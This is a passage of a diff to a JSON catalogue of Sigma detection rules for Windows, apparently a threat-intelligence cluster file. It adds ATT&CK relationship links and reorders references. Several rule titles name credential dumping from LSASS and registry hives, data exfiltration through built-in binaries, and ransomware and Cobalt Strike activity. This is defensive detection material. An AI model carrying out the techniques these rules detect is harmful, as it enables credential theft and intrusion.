"c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "value": "Potential Suspicious Activity Using SeCEdit" }, @@ -49735,6 +64115,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", "value": "Suspicious Msiexec Execute Arbitrary DLL" }, @@ -49759,6 +64148,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "value": "PurpleSharp Indicator" }, @@ -49775,8 +64173,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.exploit-db.com/exploits/37525", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://www.exploit-db.com/exploits/37525", "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], @@ -49799,8 +64197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" ], "tags": [ @@ -49908,6 +64306,15 @@ "attack.t1204" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0acaad27-9f02-4136-a243-c357202edd74", "value": "Ryuk Ransomware Command Line Activity" }, @@ -49924,8 +64331,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" ], "tags": [ @@ -49940,6 +64347,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", "value": "Default PowerSploit and Empire Schtasks Persistence" }, @@ -49964,6 +64387,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", "value": "Wscript Shell Run In CommandLine" }, @@ -49980,10 +64412,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://twitter.com/cglyer/status/1355171195654709249", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" ], "tags": [ @@ -50016,6 +64448,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", "value": "Explorer NOUACCHECK Flag" }, @@ -50044,6 +64485,15 @@ "car.2013-05-009" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", "value": "Suspicious Use of Procdump on LSASS" }, @@ -50062,10 +64512,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], @@ -50074,6 +64524,15 @@ "attack.t1567" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" }, @@ -50105,6 +64564,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "value": "Chafer Activity" }, @@ -50129,6 +64604,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "value": "Gpg4Win Decrypt Files From Suspicious Locations" }, @@ -50169,8 +64653,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" ], @@ -50218,11 +64702,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" ], "tags": [ @@ -50230,6 +64714,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", "value": "Domain Trust Discovery" }, @@ -50246,8 +64739,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" ], "tags": [ @@ -50308,6 +64801,22 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", "value": "GALLIUM Sha1 Artefacts" }, @@ -50335,6 +64844,22 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", "value": "Terminal Service Process Spawn" }, @@ -50352,9 +64877,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ @@ -50362,6 +64887,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "207b0396-3689-42d9-8399-4222658efc99", "value": "PsExec/PAExec Flags" }, @@ -50404,8 +64938,8 @@ "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" ], "tags": [ @@ -50413,6 +64947,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "value": "Operator Bloopers Cobalt Strike Commands" }, @@ -50437,6 +64980,22 @@ "attack.t1564.003" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "value": "Covenant Launcher Indicators" }, @@ -50464,6 +65023,15 @@ "attack.t1070.001" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "value": "Disable or Delete Windows Eventlog" }, @@ -50506,9 +65074,9 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" ], "tags": [ @@ -50516,6 +65084,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", "value": "Formbook Process Creation" }, @@ -50542,6 +65119,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9847f263-4a81-424f-970c-875dab15b79b", "value": "Suspicious TSCON Start as SYSTEM" }, @@ -50566,6 +65152,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", "value": "Suspicious Extexport Execution" }, @@ -50582,9 +65177,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ @@ -50592,6 +65187,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "value": "Suspicious Msiexec Quiet Install" }, @@ -50616,6 +65220,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "value": "RunDLL32 Spawning Explorer" }, @@ -50686,8 +65299,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], @@ -50719,6 +65332,22 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "value": "Suspicious Spool Service Child Process" }, @@ -50745,6 +65374,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", "value": "Rundll32 UNC Path Execution" }, @@ -50769,6 +65407,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f4bbd493-b796-416e-bbf2-121235348529", "value": "Non Interactive PowerShell" }, @@ -50785,8 +65432,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ @@ -50798,6 +65445,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", "value": "Execution of Renamed PaExec" }, @@ -50825,6 +65488,22 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "value": "Esentutl Gather Credentials" }, @@ -50841,9 +65520,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], "tags": [ @@ -50854,6 +65533,29 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", "value": "Renamed ZOHO Dctask64" }, @@ -50870,8 +65572,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" ], "tags": [ @@ -50879,6 +65581,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "value": "Use of Remote.exe" }, @@ -50903,6 +65614,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", "value": "Use of OpenConsole" }, @@ -50975,6 +65695,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "221b251a-357a-49a9-920a-271802777cc0", "value": "WMI Process Reconnaissance" }, @@ -51000,6 +65729,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "value": "Ilasm Lolbin Use Compile C-Sharp" }, @@ -51024,6 +65762,15 @@ "attack.t1593.003" ] }, + "related": [ + { + "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aef9d1f1-7396-4e92-a927-4567c7a495c1", "value": "Suspicious Git Clone" }, @@ -51049,6 +65796,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", "value": "Shell32 DLL Execution in Suspicious Directory" }, @@ -51073,6 +65829,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", "value": "Suspicious MsiExec Embedding Parent" }, @@ -51147,6 +65912,15 @@ "attack.t1021.001" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48a61b29-389f-4032-b317-b30de6b95314", "value": "Suspicious Plink Port Forwarding" }, @@ -51164,10 +65938,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://vms.drweb.fr/virus/?i=24144899", + "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" ], "tags": [ @@ -51247,6 +66021,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", "value": "Too Long PowerShell Commandlines" }, @@ -51271,6 +66054,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", "value": "Remote File Download via Desktopimgdownldr Utility" }, @@ -51316,6 +66108,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", "value": "Credential Acquisition via Registry Hive Dumping" }, @@ -51340,6 +66141,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "43103702-5886-11ed-9b6a-0242ac120002", "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" }, @@ -51369,6 +66179,36 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", "value": "SquiblyTwo Execution" }, @@ -51396,6 +66236,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", "value": "Automated Collection Command Prompt" }, @@ -51445,6 +66294,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", "value": "Suspicious Execution of Shutdown" }, @@ -51496,6 +66354,29 @@ "cve.2019.1378" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "value": "Exploiting SetupComplete.cmd CVE-2019-1378" }, @@ -51512,15 +66393,24 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://twitter.com/pabraeken/status/993298228840992768", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, @@ -51558,8 +66448,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", 